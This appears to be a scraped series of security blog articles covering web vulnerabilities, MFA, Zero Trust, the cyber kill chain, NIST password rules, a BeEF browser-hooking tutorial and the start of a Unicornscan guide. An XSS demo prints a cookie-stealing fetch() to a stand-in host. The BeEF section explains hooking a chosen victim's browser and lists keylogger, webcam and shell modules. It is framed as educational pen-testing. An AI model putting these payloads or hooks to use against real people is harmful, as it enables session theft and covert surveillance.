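Escaping in practice, using Python's stdlib `html` module (the attacker comment is a hypothetical stored-XSS payload):

```python
import html

# Attacker-supplied comment attempting a stored XSS attack
user_comment = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'

# Escaping turns markup metacharacters into inert entities before the
# value is embedded in an HTML page, so browsers render it as text
safe = html.escape(user_comment)
print(safe)
```

Note this covers only the HTML-body context; values placed in attributes, URLs, or inline JavaScript need the context-sensitive encoding mentioned above.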

XSS-based attacks are of three types: reflected XSS, DOM XSS, and stored XSS. All of these have significant impact, but stored XSS is the most damaging, enabling, e.g., theft of credentials and delivery of malware to victims.

Insecure deserialization:

Serialization means taking objects and converting them into a format so that the data can be used for other purposes later on, while deserialization means the opposite: unpacking serialized data for use by an application. Insecure deserialization means tampering with data that has been serialized, just before it is unpacked or deserialized. Insecure deserialization can lead to remote code execution, and it is used to perform other malicious tasks such as privilege escalation, injection attacks, and replay attacks. Some tools are available for discovering these kinds of flaws, but human assistance is frequently needed to validate the problem. Exploiting deserialization is somewhat difficult, as the exploits won't work without some manual changes.

The vulnerability arises when the application deserializes malicious objects supplied by the attacking entity. This can lead to two types of attacks: attacks on data structures and objects, in which the attacker modifies application logic or executes remote code, and typical data-tampering attacks, in which existing data structures are used with modified content, for example in access-control-related attacks. Serialization may be used in remote procedure calls (RPC), inter-process communication (IPC), caching of data, web services, database cache servers, file systems, API authentication tokens, HTML cookies, HTML form parameters, etc. Deserialization attacks can be mitigated by not using serialized objects from untrusted sources, implementing integrity checks, isolating the deserializing code in a low-privileged environment, and monitoring incoming and outgoing network connections from servers that deserialize frequently.
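Python's `pickle` module is a concrete example of why untrusted serialized objects are dangerous, while a plain-data format like JSON is not (the `Evil` class is a deliberately harmless demonstration payload):

```python
import json
import pickle

# pickle executes a callable on load: __reduce__ tells the unpickler
# what to run, so a crafted payload runs attacker-chosen logic
class Evil:
    def __reduce__(self):
        return (print, ("arbitrary code ran during unpickling!",))

payload = pickle.dumps(Evil())
pickle.loads(payload)  # the side effect fires here -- never unpickle untrusted data

# JSON, by contrast, can only yield plain data, never executable objects
data = json.loads('{"user": "alice", "role": "admin"}')
print(data["role"])
```

A real payload would invoke something like `os.system` instead of `print`; the mitigation is exactly what the text says: do not deserialize objects from untrusted sources, or use a data-only format.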

Using components with known vulnerabilities:

Components such as libraries, frameworks, and software modules are used by most developers in web applications. These libraries help the developer avoid unnecessary work and provide needed functionality. Attackers look for flaws and vulnerabilities in these components to coordinate attacks: a security loophole found in one component can make every site using that component vulnerable. Exploits for these vulnerabilities are often already publicly available, whereas writing a custom exploit from scratch takes a lot of effort. This is a very common and widespread issue; using large numbers of components in a web application can mean that the developers do not even know or understand all the components in use, and patching and updating all of them is a long-term effort.

An application is vulnerable if the developer does not know the versions of the components used; if the software is outdated, i.e., the operating system, DBMS, running software, runtime environments, or libraries; if vulnerability scanning is not done regularly; or if the compatibility of patched software is not tested by the developers. This can be prevented by removing unused dependencies, files, documentation, and libraries; checking the versions of client- and server-side components regularly; obtaining components and libraries from official, trusted, and secure sources; monitoring unpatched libraries and components; and maintaining a plan for updating and patching vulnerable components regularly.
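Knowing your component versions is the first step, and it can be automated. A small sketch using Python's stdlib `importlib.metadata` to inventory installed packages (matching the inventory against a vulnerability feed such as OSV or NVD is left to dedicated tooling):

```python
from importlib import metadata

# Build an inventory of installed packages and their versions -- the raw
# material for checking against a vulnerability database
inventory = {
    dist.metadata["Name"]: dist.version
    for dist in metadata.distributions()
    if dist.metadata["Name"]
}
for name, version in sorted(inventory.items())[:5]:
    print(f"{name}=={version}")
```

Running an inventory like this regularly (and diffing it against the previous run) makes the "developer doesn't know the version" failure mode much harder to fall into.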

These vulnerabilities often lead to minor impacts, but they can also lead to compromise of the server and the entire system. Many large breaches have relied on known vulnerabilities in components. The use of vulnerable components undermines application defenses and can be the starting point for a larger attack.

Insufficient logging and monitoring:

Most systems don’t take enough measures and steps to detect data breaches. The average response time of an incident is 200 days after it has happened, this is a lot of time to do all the nasty stuff for an attacking entity. Insufficient logging and monitoring allow the attacker to further attack the system, maintain its hold on the system, tamper, hold and extract data as per the need. Attackers use the lack of monitoring and response in their favour to attack the web application.
Insufficient logging and monitoring can occur anywhere: application logs are not monitored for unusual activity; auditable events such as failed login attempts and high-value transactions are not properly logged; warnings and errors generate unclear messages; no alert is triggered during pentesting with automated DAST tools; active attacks cannot be detected or alerted on quickly; and so on. These issues can be mitigated by ensuring that all logins, access-control failures, and server-side input-validation failures are logged with enough context to identify malicious user accounts, and retained long enough for delayed forensic investigation; by ensuring that generated logs are in a format compatible with centralized log management solutions; by performing integrity checks on high-value transactions; and by establishing a system for timely alerts on suspicious activity.
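A minimal sketch of that kind of logging, assuming a simple JSON-lines format (easy to ship to centralized log management) and an illustrative alert threshold that is not taken from any specific standard:

```python
# Sketch: log authentication failures in a machine-readable format and raise
# an alert when one account accumulates too many failures.
# The threshold and field names are illustrative, not from any standard.
import json
import logging
from collections import Counter

logging.basicConfig(level=logging.INFO, format="%(message)s")
log = logging.getLogger("auth")
failures = Counter()
ALERT_THRESHOLD = 3  # illustrative value

def record_failed_login(user, source_ip):
    failures[user] += 1
    # JSON lines are straightforward for a centralized log solution to ingest.
    log.info(json.dumps({"event": "login_failed", "user": user, "ip": source_ip}))
    if failures[user] >= ALERT_THRESHOLD:
        log.warning(json.dumps({"event": "alert_bruteforce", "user": user}))
        return True  # signal that an alert was raised
    return False

for _ in range(3):
    alerted = record_failed_login("alice", "203.0.113.7")
print(alerted)  # True after the third consecutive failure
```

The point is not the specific threshold but that failures are recorded in a consistent, parseable form and that repeated failures trigger an alert instead of sitting unread.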

Most successful attacks start with probing a system for vulnerabilities; allowing such probing to go undetected can result in the compromise of the whole system.

Conclusion:

The security vulnerabilities in a web application affect all the entities related to that application, so they must be taken care of to provide a safe and secure environment for users. Attackers can use these vulnerabilities to compromise a system, get hold of it, and escalate privileges. The impact of a compromised web application ranges from stolen credit card credentials and identity theft to the leaking of highly confidential information, depending on the needs and attack vectors of the malicious entities.

]]>
What is Multi-Factor Authentication https://linuxhint.com/multi_factor_authentication/ Sat, 26 Sep 2020 18:24:41 +0000 https://linuxhint.com/?p=69300 Multi-Factor Authentication, otherwise known as MFA or 2FA, means that you need more than one credential to access your IT resources, such as your applications, systems, files, or networks. A username and password alone are vulnerable to brute-force attacks and can be cracked by hackers. We can add extra security to our resources using multi-factor authentication, which enhances the security of the system by requiring authorized users to present more than one credential. If a hacker obtains your password, he will not be able to get into your system unless he also provides the secondary credential generated by a multi-factor authentication device. Beyond the username and password, the additional authentication factor may be a hardware device, a software program, the location you are in, a specific time window, or something else you can remember. Some compatible multi-factor authentication programs that you can install on your mobile phone are listed below.

  • Authy
  • Google Authenticator
  • LastPass Authenticator
  • Duo
  • Okta Verify
  • FreeOTP

Some other authenticators, which are not listed above may also be compatible.

Difference between MFA and 2FA

So what’s the difference between 2FA and MFA? Both secure your data by making it accessible only when you provide extra credentials beyond your username and password: you get access if and only if you prove your identity using separate credentials generated by different methods.

2FA is a subset of MFA. In Two-Factor Authentication, a user must provide exactly two authentication credentials: one is a simple password, and the other is an authentication token generated by a 2FA device.
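The one-time codes that authenticator apps generate typically follow RFC 6238 (TOTP), an HMAC of a 30-second time counter. A minimal sketch with only Python's standard library, checked against the RFC's published test vector:

```python
# Sketch of RFC 6238 TOTP: the kind of time-based code a 2FA app generates.
import hashlib
import hmac
import struct
import time

def hotp(secret, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 of an 8-byte counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                   # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code)[-digits:].zfill(digits)

def totp(secret, timestamp=None, step=30):
    """RFC 6238 TOTP: HOTP over the number of 30-second steps since the epoch."""
    if timestamp is None:
        timestamp = int(time.time())
    return hotp(secret, timestamp // step)

# RFC 6238 test vector: secret "12345678901234567890" at time 59 seconds
print(totp(b"12345678901234567890", timestamp=59))  # 287082
```

Both the server and the user's device compute this code from a shared secret, so the code itself never travels until the user types it in.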

Authentication Factors in MFA

Authentication Factors are different methods of using multi-factor authentication to make your resources more secure. The following are some categories that can be used as Multi-Factor authentication factors.

  • Knowledge: Authentication Factor may be something a user knows or memorizes just like his username and password. Security questions are the best example of knowledge as an authentication factor.
  • Possession: The authentication factor may be something a user is the owner of. For example, a code sent to your smartphones or any other hardware device.
  • Inherence: The inherence factor also known as a biometric identifier is a category that involves something that is inherent to a user like a fingerprint, retina or voice, etc.
  • Time: The authentication factor may be a time window during which a user can prove his identity. For example, you can set a specific time window to access your system, and other than that time span, no one will be able to access the system.
  • Location: This type of authentication factor involves the physical location of the user. In this case, you set your system to determine your physical location and your system can only be accessed from a specific location.

How Multi-Factor Authentication Works

In this section, we will discuss how all the authentication factors work listed above.

Knowledge Factor:

The knowledge factor is something, like a username and password, that a user has to remember and provide to access his IT resources. Setting a security question or secondary credential on your resources makes their security much stronger, as no one can access them without providing that extra credential, even with your username and password in hand. Losing that secondary credential, however, may lock you out of your resources permanently.

Possession Factor:

In this case, a user has a third-party hardware device, or a software program installed on his smartphone, that generates a secondary credential. Whenever you try to access your system, it asks for that secondary credential, and you must supply the value generated by the third-party module you possess. SMS and email authentication tokens are other forms of authentication based on the possession factor. Note that anyone with access to your MFA device may access your system, so keep the device safe.

Inherence Factor:

In this category, you use something inherent to you as a secondary credential. Fingerprint scans, voice recognition, retinal or iris scans, facial scans, and other biometric identifiers are the best examples of the inherence factor. It is among the strongest methods of securing your resources with multi-factor authentication.

Time Factor:

You can also use time as an authentication factor to secure your IT resources. In this scenario, we specify a time window during which the resources can be accessed; outside that window, they are no longer accessible. This factor is useful when you only need access during specific hours. If you need to access your resources at arbitrary times, it is not suitable.

Location Factor:

To make your applications and other IT resources more secure, you can also use location-based multi-factor authentication. In this type of authentication, you block or grant access to users based on their network location, for example blocking access from regions or countries that traffic should never come from. However, this factor can sometimes be bypassed simply by changing IP addresses, for instance through a proxy or VPN, so it may fail if relied on alone.
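A minimal sketch of a location factor implemented as an IP allowlist; the network ranges are example values, and as noted above, source addresses can be spoofed or proxied, so this check alone is weak:

```python
# Sketch: a location factor as an IP allowlist. Networks below are examples.
import ipaddress

ALLOWED_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),      # example: internal office LAN
    ipaddress.ip_network("203.0.113.0/24"),  # example: branch office range
]

def location_allows(client_ip):
    """Grant the location factor only if the source IP is in an allowed network."""
    addr = ipaddress.ip_address(client_ip)
    return any(addr in net for net in ALLOWED_NETWORKS)

print(location_allows("10.1.2.3"))      # True
print(location_allows("198.51.100.9"))  # False
```

In a real deployment this would be combined with at least one other factor, precisely because the address can be falsified.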

Conclusion

With the growth of the IT industry, storing user data securely is a major challenge for organizations. While network administrators work to make their networks more secure, new algorithms are being designed to store user credentials safely. Sometimes traditional usernames and passwords are not enough to block unwanted access to your data: hackers find their way into a database, take the user credentials, and thereby erode users’ confidence in the traditional way of securing credentials. This is where multi-factor authentication comes in, ensuring that no one can access a user’s data except the user. Adding multi-factor authentication to your application shows customers that you take their security seriously.

]]>
Zero Trust Security Model https://linuxhint.com/zero_trust_security_model/ Mon, 21 Sep 2020 06:00:27 +0000 https://linuxhint.com/?p=68808

Introduction

The Zero Trust Network, also called Zero Trust Architecture, is a model that was developed in 2010 by John Kindervag, then a principal analyst at Forrester Research. A zero-trust security system helps to protect enterprise systems and improves cybersecurity.

Zero Trust Security Model

The Zero Trust Security Model is a security concept built on the principle that organizations should never automatically trust anything, whether inside or outside their perimeter. Instead, they must verify everything and everyone that tries to connect to their systems before granting any access.

Why Zero Trust?

One of the main reasons for adopting this security model is that cybercrime costs the world trillions of dollars every year.

The Annual Cybercrime Report estimated that cybercrime would cost the world $6 trillion per year by 2020, and this figure is expected to keep rising.

Protection for a New and Cybercrime-Free World

The Zero Trust model of information security rejects the old view in which organizations focused on defending the perimeter while assuming that everything already inside it posed no threat and that the organization was therefore clear of any danger within its perimeter.

Security and technology experts agree that this approach is not working. They point to internal breaches that have happened in the past because of cybercrime and hacking: once hackers got past an organization’s firewalls, they moved through the internal systems without any resistance. This shows that even firewalls cannot protect a system from a breach on their own. There is also a bad habit of trusting anything and anyone without checking.

Approach Behind Zero Trust

The Zero Trust approach depends upon modern technologies and methods to achieve the target of securing an organization.

The Zero Trust model calls for businesses to apply micro-segmentation and granular perimeter enforcement based on users, their locations, and other data, in order to decide whether to trust a user, machine, or application that is trying to access a specific part of the enterprise or organization.

Zero Trust also encompasses supporting policies, for example giving users the least access they require to complete their task. Creating a Zero Trust environment is not just about deploying individual technologies; it is about using these and other technologies to enforce the idea that no one and nothing gets access until it has proven that it should be trusted.
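A minimal sketch of a deny-by-default Zero Trust access decision, combining verification checks with least-privilege access; the check names and role here are illustrative, not any specific product's policy schema:

```python
# Sketch: a deny-by-default access decision. Every request must pass all
# checks, and the granted role is the least privilege needed for the task.
# The policy fields below are illustrative examples.

POLICY = {"required_checks": ("identity_verified", "device_healthy", "mfa_passed")}

def authorize(request):
    """Deny by default; grant only when every required check has passed."""
    for check in POLICY["required_checks"]:
        if not request.get(check, False):  # missing evidence counts as failure
            return ("deny", check)
    return ("allow", request.get("least_privilege_role", "read-only"))

print(authorize({"identity_verified": True, "device_healthy": True}))
# ('deny', 'mfa_passed')  -- nothing unverified is implicitly trusted
```

The essential property is the default: absence of proof is treated as failure, which is the opposite of the old perimeter model.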

Of course, organizations know that creating a Zero Trust security model is not an overnight achievement; something this complex can take years to implement in its most secure, ideal form.

Many companies are shifting to cloud security systems, which are well suited to a Zero Trust approach. Now is the time to prepare for a Zero Trust transition. All organizations, large or small, should have Zero Trust security systems for their data safety.

Many IT experts blindly trust their security system, hoping that their data is kept safe by firewalls, although this is not necessarily true. We have all been taught that the firewall is the best thing to keep hackers out of the way. We need to understand that hackers are currently within range of our sensitive data and that a security breach can happen at any time. It is our responsibility to take care of our security in every possible way.

Organizations also need to know that Zero Trust requires continuous effort, as does any other IT or security protocol or system, and that certain aspects of the Zero Trust model may pose more challenges than other security protocols, according to some experts. Because of these difficulties, some companies have not been able to fully put the model into practice.

We should use the Zero Trust model as a compulsory part of our security management and think of it as an infrastructural transformation that helps advance our security protocols. Our security technologies are outdated, and the world is modernizing day by day, so we have to change the way we take care of system security: think in terms of ubiquitous security, be proactive rather than merely reactive, and, above all, think about security differently.

In a Zero Trust Model, access may be granted only after checking all the possibilities associated with danger, advantages, and disadvantages. We are now living in an era where we cannot trust that only having a firewall in the system will help save us from hackers and cybercrimes.

Conclusion

In conclusion, Zero Trust should be the rule of organizing strict access to your information or data. This model is simply based on not trusting a single person with sensitive data. We must have Zero Trust Security Models in our systems so that we are safe from hacking. To have maximum security, we must implement Zero Trust security systems in organizations that require tough security for their data. We can no longer only trust firewalls to protect us from cybercrimes, and we have to do something about it ourselves.

]]>
Steps of the cyber kill chain https://linuxhint.com/cyber_kill_chain_steps/ Wed, 16 Sep 2020 19:20:21 +0000 https://linuxhint.com/?p=68427

Cyber kill chain

The cyber kill chain (CKC) is a traditional security model that describes an old-school scenario, an external attacker taking steps to penetrate a network and steal its data, breaking the attack down into stages to help organizations prepare. The CKC was developed by Lockheed Martin’s computer incident response team. It describes an attack by an external adversary trying to gain access to data within the security perimeter.

Each stage of the cyber kill chain represents a specific attacker goal. Designing your surveillance and response plan around the kill chain model is effective because it focuses on how attacks actually happen. Stages include:

  • Reconnaissance
  • Weaponization
  • Delivery
  • Exploitation
  • Installation
  • Command and control
  • Actions on Objectives

Steps of the cyber kill chain will now be described:

Step 1: Reconnaissance

Reconnaissance includes harvesting email addresses, conference information, and the like. A reconnaissance attack is the threat actor’s effort to gather as much data about the network systems as possible before launching other, more genuinely hostile attacks. Reconnaissance comes in two types: passive and active. The attacker focuses on “who,” meaning which privileged people to target for system access or for confidential data, and on the network itself: its architecture and layout; its tools, equipment, and protocols; and its critical infrastructure. The goal is to understand the victim’s behavior well enough to break in.

Step 2: Weaponization

In the weaponization stage, the attacker builds a deliverable payload by coupling an exploit with a backdoor.

Next, attackers use sophisticated techniques to re-engineer some core malware to suit their purposes. The malware may exploit previously unknown vulnerabilities, aka “zero-day” exploits, or some combination of vulnerabilities, to quietly defeat a network’s defenses, depending on the attacker’s needs and abilities. By re-engineering the malware, attackers reduce the chances that traditional security solutions will detect it. For example, hackers have used thousands of internet devices previously infected with malicious code, known as a “botnet” or, jokingly, a “zombie army,” to mount a particularly powerful distributed denial-of-service (DDoS) attack.

Step 3: Delivery

The attacker sends the victim the malicious payload using email, which is just one of a great many intrusion methods the attacker may employ. There are over 100 possible delivery methods.

Target:
Attackers start the intrusion using the weapon developed in step 2. The two basic methods are:

  • Controlled delivery, which represents direct delivery, such as hacking an open port.
  • Released delivery, which transmits the malware to the target indirectly, for example by phishing.

This stage presents defenders with their first and most significant opportunity to obstruct an operation; however, blocking here also forfeits some key capabilities and other highly valued intelligence about the attack. At this stage, we measure the viability of the partial intrusion attempts that are stopped at the delivery point.

Step 4: Exploitation

Once attackers identify a weakness in your system, they exploit it and execute their attack. During the exploitation stage of the attack, the host machine is compromised, and the delivery mechanism typically takes one of two measures:

  • Install the malware directly (a dropper), which allows the attacker’s commands to execute.
  • Download and then install additional malware (a downloader).

In recent years, this has become an area of expertise within the hacking community that is often demonstrated at events like Blackhat, Defcon, and the like.

Step 5: Installation

At this stage, installing a remote-access trojan or backdoor on the victim’s system allows the attacker to maintain persistence in the environment. Installing malware on the asset usually requires the end user to unwittingly enable the malicious code, so defensive action is critical at this point. One technique is to deploy a host-based intrusion prevention system (HIPS) to alert on, or block, common installation paths, for example the RECYCLER directory. It is critical to understand whether the malware requires administrator privileges or only user privileges to execute on the target. Defenders must understand the endpoint auditing process to uncover abnormal file creations, and they need to examine malware compile times to determine whether a sample is old or new.

Step 6: Command and control

Ransomware uses command-and-control connections, for example to download the encryption keys before it seizes your files. Remote-access trojans, likewise, open a command-and-control connection so the attacker can reach your system data remotely. This gives the attacker continuous connectivity to the environment, and it gives the defense a window in which to detect the activity.

How does it work?

Command and control is usually performed via a beacon out of the network over an allowed path. Beacons take many forms, but in most cases they tend to be:

  • HTTP or HTTPS
  • Traffic that appears benign thanks to falsified HTTP headers

In cases where the communication is encrypted, beacons tend to use self-signed certificates or custom encryption.
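One way defenders hunt for such beacons is interval analysis: beacons often call home on a fixed schedule, so near-constant gaps between outbound connections to a single host are a hint worth alerting on. A minimal sketch, with illustrative timestamps and an illustrative tolerance:

```python
# Sketch: flag suspiciously regular outbound-connection timing ("beaconing").
# Timestamps (seconds) and the tolerance value are illustrative examples.
from statistics import pstdev

def looks_like_beacon(timestamps, tolerance=2.0):
    """True if the gaps between connections are suspiciously regular."""
    if len(timestamps) < 3:
        return False  # too few samples to judge regularity
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    return pstdev(gaps) <= tolerance  # low spread = metronome-like traffic

print(looks_like_beacon([0, 60, 120, 181, 240]))  # True: ~60 s heartbeat
print(looks_like_beacon([0, 5, 300, 310, 900]))   # False: human-like bursts
```

Real detections add jitter handling and per-destination grouping, since malware authors deliberately randomize beacon intervals to defeat exactly this check.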

Step 7: Actions on Objectives

Action refers to the manner in which the attacker attains his final target. The attacker’s ultimate goal could be anything from extracting a ransom from you in exchange for decrypting files to exfiltrating customer information from the network. In the latter example, data loss prevention solutions could stop the exfiltration before the data leaves your network. Alternatively, monitoring can be used to identify activities that deviate from set baselines and notify IT that something is wrong. This is an intricate and dynamic assault process that can take place over months and involve hundreds of small steps. Once this stage is identified within an environment, it is necessary to initiate the prepared reaction plans. At the very least, an inclusive communication plan should be in place, covering the detailed evidence that should be raised to the highest-ranking official or governing board, the deployment of endpoint security devices to block information loss, and the preparation to brief a CIRT group. Having these resources well established ahead of time is a “MUST” in today’s rapidly evolving cybersecurity threat landscape.

]]>
NIST Password Guidelines https://linuxhint.com/nist_password_guidelines/ Wed, 16 Sep 2020 11:46:04 +0000 https://linuxhint.com/?p=68396 The National Institute of Standards and Technology (NIST) defines security parameters for government institutions and helps organizations meet consistent administrative requirements. In recent years, NIST has revised its password guidelines. Account Takeover (ATO) attacks have become a rewarding business for cybercriminals. In an interview, a member of NIST’s top management observed that traditional guidelines produce passwords that are hard for legitimate users to remember yet easy for bad guys to guess (https://spycloud.com/new-nist-guidelines). This implies that the art of picking the most secure passwords involves a number of human and psychological factors. NIST has developed the Cybersecurity Framework (CSF) to manage and overcome security risks more effectively.

NIST Cybersecurity Framework

Also known as “Critical Infrastructure Cybersecurity,” the NIST cybersecurity framework presents a broad set of rules specifying how organizations can keep cybercriminals under control. The NIST CSF comprises three main components:

  • Core: Leads organizations to manage and reduce their cybersecurity risk.
  • Implementation Tier: Helps organizations by providing information regarding the organization’s perspective on risk management of cybersecurity.
  • Profile: Organization’s unique structure of its requirements, objectives, and resources.

Recommendations

The following include suggestions and recommendations provided by NIST in their recent revision of password guidelines.

  • Character Length: Organizations should require a minimum password length of 8 characters, and NIST highly recommends allowing passwords of up to 64 characters.
  • Preventing Unauthorized Access: If an unauthorized person has tried to log in to your account, it is recommended to change the password, since the attempt may mean the password has been targeted.
  • Compromised Passwords: When small organizations or ordinary users encounter a stolen password, they usually change it and forget the incident. NIST suggests keeping a record of compromised passwords and screening present and future password choices against it.
  • Hints: Do not use password hints or security questions when choosing passwords.
  • Authentication Attempts: NIST strongly recommends restricting the number of failed authentication attempts. With the number of attempts limited, it becomes impractical for hackers to try many password combinations at login.
  • Copy and Paste: NIST recommends allowing paste functionality in password fields, for the convenience of password managers; earlier guidelines advised against it. Password managers rely on pasting when a single master password is used to retrieve stored passwords.
  • Composition Rules: Mandatory character-composition rules frustrate end users, so NIST recommends skipping them. NIST concluded that users forced to mix character classes tend to end up with weaker passwords. For example, if a user sets the password ‘timeline,’ the system rejects it and demands a mix of uppercase and lowercase characters, and the user then makes a minimal, predictable change to satisfy the rule. NIST therefore suggests dropping composition requirements, as they can have an unfavorable effect on security.
  • Use of Characters: Passwords containing spaces are often rejected, or the user forgets where the spaces were, making the password hard to recall. NIST recommends accepting whatever combination of characters the user wants, since such a password can be more easily memorized and recalled when required.
  • Password Change: Organizational security policies often mandate frequent password changes, and most users respond by choosing easy, memorable passwords that they expect to replace soon. NIST recommends not forcing frequent changes and instead choosing a password complex enough to serve for a long time while satisfying both the user and the security requirements.

What if the Password is Compromised?

Hackers’ favorite job is to breach security barriers, and to that end they continually look for new ways through. Breach dumps contain countless combinations of usernames and passwords. Most organizations maintain a list of compromised passwords, which is also accessible to hackers, and block any password selected from that pool. For organizations that cannot obtain such a list, NIST provides guidelines on what a password blocklist can contain:

  • A list of those passwords that have been breached previously.
  • Simple words selected from the dictionary (e.g., ‘contain,’ ‘accepted,’ etc.)
  • Passwords consisting of repetitive or sequential characters (e.g., ‘cccc,’ ‘abcdef,’ or ‘a1b2c3’).
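These screening rules can be sketched in a few lines; the blocklist sample and the sequence heuristic below are illustrative simplifications of NIST's guidance, not a complete implementation:

```python
# Sketch of NIST-style password screening: enforce length bounds, allow spaces,
# and reject blocklisted entries or trivially repetitive/sequential strings.
# The blocklist is a tiny illustrative sample.

BLOCKLIST = {"password", "12345678", "qwertyuiop"}  # sample breached/dictionary words

def is_sequential(pw):
    """Detect runs like 'cccc' or 'abcdef' (a simplified heuristic)."""
    steps = [ord(b) - ord(a) for a, b in zip(pw, pw[1:])]
    return len(set(steps)) == 1 and steps[0] in (-1, 0, 1)

def acceptable(pw):
    if not 8 <= len(pw) <= 64:          # NIST length bounds
        return False
    if pw.lower() in BLOCKLIST:         # previously breached / dictionary words
        return False
    if is_sequential(pw):               # repetition or simple series
        return False
    return True                         # spaces and any characters are fine

print(acceptable("cccccccc"))               # False: repetition
print(acceptable("abcdefgh"))               # False: sequence
print(acceptable("correct horse battery"))  # True: long passphrase with spaces
```

Note that nothing here enforces composition rules: a long passphrase with spaces passes, which is exactly the behavior the revised guidelines favor.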

Why Follow the NIST Guidelines?

The guidelines provided by NIST keep in view the main security threats related to password hacks for many different kinds of organizations. The good thing is that, if they observe any violation of the security barrier caused by hackers, NIST can revise their guidelines for passwords, as they have been doing since 2017. On the other hand, other security standards (e.g., HITRUST, HIPAA, PCI) do not update or revise the basic initial guidelines that they have provided.

]]>
Hacking with BeEF https://linuxhint.com/hacking_beef/ Wed, 26 Aug 2020 20:16:00 +0000 https://linuxhint.com/?p=66437 Browser Exploitation Framework (BeEF) is a penetration testing, or pen-testing, tool designed to provide effective client-side attack vectors and to exploit any potential vulnerabilities in the web browser. BeEF is unique among pen-testing frameworks because it does not try to tackle the more secure network-interface aspects of a system. Instead, BeEF latches on to one or more web browsers to use as a beachhead for injecting payloads, executing exploit modules, and testing a system for vulnerabilities through browser-based utilities.

BeEF has a very capable, yet straightforward, API that serves as the pivot upon which its efficiency stands and grows out into an imitation of a full-fledged cyber attack.

This short tutorial will take a look at several ways that this flexible and versatile tool can be of use in pen-testing.

Installing the BeEF Framework

A Linux OS such as Kali Linux, Parrot OS, BlackArch, Backbox, or Cyborg OS is required to install BeEF on your local machine.

Although BeEF comes pre-installed in various pen-testing operating systems, it may not be installed in your case. To check whether BeEF is installed, look for BeEF in your Kali Linux directory. To do so, go to Applications > Kali Linux > System Services > beef start.

Alternatively, you can fire up BeEF from a new terminal emulator by entering the following code:

$ cd /usr/share/beef-xss
$ ./beef

To install BeEF on your Kali Linux machine, open the command interface and type in the following command:

$ sudo apt-get update
$ sudo apt-get install beef-xss

BeEF should now be installed under /usr/share/beef-xss.

You can start using BeEF using the address described previously in this section.

Welcome to BeEF

Access the BeEF server by launching your web browser and navigating to localhost (127.0.0.1). Now you can see the BeEF GUI in its full glory.

You can access the BeEF web GUI by typing the following URL in your web browser:

http://localhost:3000/ui/authentication

The default credentials, both the username and the password, are “beef”:


Now that you have logged into the BeEF web GUI, proceed to the “Hooked Browsers” section, which lists Online Browsers and Offline Browsers and shows each victim’s hooked status.

Using BeEF

This walkthrough will demonstrate how to use BeEF in your local network using the localhost.

For the connections to be made outside the network, we will need to open ports and forward them to the users waiting to connect. In this article, we will stick to our home network. We will discuss port forwarding in future articles.

Hooking a Browser

To get to the core of what BeEF is about, first, you will need to understand what a BeEF hook is. It is a JavaScript file, used to latch on to a target’s browser to exploit it while acting as a C&C between it and the attacker. This is what is meant by a “hook” in the context of using BeEF. Once a web browser is hooked by BeEF, you can proceed to inject further payloads and begin with post-exploitation.

To find your local IP address, you open a new terminal and enter the following:

$ sudo ifconfig

Follow the steps below to perform the attack:

  1. To target a web browser, you will first need to identify a webpage that the victim to-be likes to visit often, and then attach a BeEF hook to it.
  2. Deliver a JavaScript payload, preferably by including the JavaScript hook in the web page’s header. The target browser becomes hooked once the victim visits the site.
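In practice, "attaching the hook" means injecting a single script tag that loads hook.js from the BeEF server (which listens on port 3000 by default). A minimal sketch of that injection; the IP address below is an illustrative placeholder for your own machine's local address:

```python
# Sketch: what "attaching the BeEF hook" looks like. A single script tag
# pointing at the BeEF server is inserted into the page's head.
BEEF_SERVER = "192.168.0.10"  # placeholder: substitute your attacking machine's IP

def inject_hook(page_html):
    """Insert the BeEF hook script tag just before the closing </head> tag."""
    hook_tag = f'<script src="http://{BEEF_SERVER}:3000/hook.js"></script>'
    return page_html.replace("</head>", hook_tag + "</head>", 1)

page = "<html><head><title>demo</title></head><body>hi</body></html>"
print("hook.js" in inject_hook(page))  # True
```

Any browser that renders the modified page then loads hook.js and begins polling the BeEF server, which is what makes it appear under "Hooked Browsers."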

If you have been able to follow these steps without any problems, you should be able to see the hooked IP address and OS platform in the BeEF GUI. You can find out more about the compromised system by clicking on the hooked browser listed in the window.

BeEF also makes several generic webpage templates available for your use, such as the demo page below:

http://localhost:3000/demos/butcher/index.html

You can glean all sorts of information from here, such as the plugins and extensions that the browser is using, and various information about the hardware and software specs of the target.

The BeEF framework goes so far as to create complete logs of mouse movements, double-clicks, and other actions performed by the victim.

Here is a list of available modules that can be used to breach a designated system. These modules include keyloggers and spyware, including the ones that use the webcams and microphones of the target browser.

Note that certain commands have a colored icon. These icons all have different connotations that you can find out by taking the ‘getting started’ introductory tour, which introduces various aspects of the BeEF interface. Also, notice how each module has a traffic light icon associated with it. These traffic symbols are used to indicate any of the following:

  • The command module works against the target and should be invisible to the user
  • The command module works against the target but may be visible to the user
  • The command module has yet to be verified against this target
  • The command module does not work against this target

You can also send shell commands to the target system, as shown below:

Coupled with Metasploit, BeEF can be used to perform quite varied and intricate system exploitation using modules, such as browser_auto_pwn.

Conclusion

BeEF is an incredibly powerful tool that you can use to fortify systems against cyberattacks. From providing spyware modules to tracking mouse movement on the targeted system, BeEF can do it all. It is a good idea, therefore, to test your system using this security forensics tool.

Hopefully, you found this tutorial useful to get you started with this tool with such diverse, useful functionality.

]]>
Unicornscan: A beginner’s guide https://linuxhint.com/unicornscan_beginner_tutorial/ Tue, 25 Aug 2020 19:15:39 +0000 https://linuxhint.com/?p=66266 Port scanning is one of the most popular tactics in use by blackhat hackers. Consequently, it is also frequently used in ethical hacking to check systems for vulnerabilities. Several tools facilitate port scanning; nmap, NetCat, and Zenmap are a notable few.

But today, we’ll talk about another great port scanner, Unicornscan, and how to use it in your next port scan. Like other popular port scanning tools such as nmap, it has several great features of its own. One such feature is that, unlike other port scanners, it sends and receives packets through two separate threads.

Known for its asynchronous TCP and UDP scanning capabilities, Unicornscan enables its users to discover details on network systems through alternative scanning protocols.

Unicornscan’s attributes

Before we attempt a network and port scan with unicornscan, let’s highlight some of its defining features:

  • Asynchronous stateless TCP scanning with each of the TCP flags or flag combinations
  • Asynchronous protocol-specific UDP scanning
  • Superior interface for measuring a response from a TCP/IP-enabled stimulus
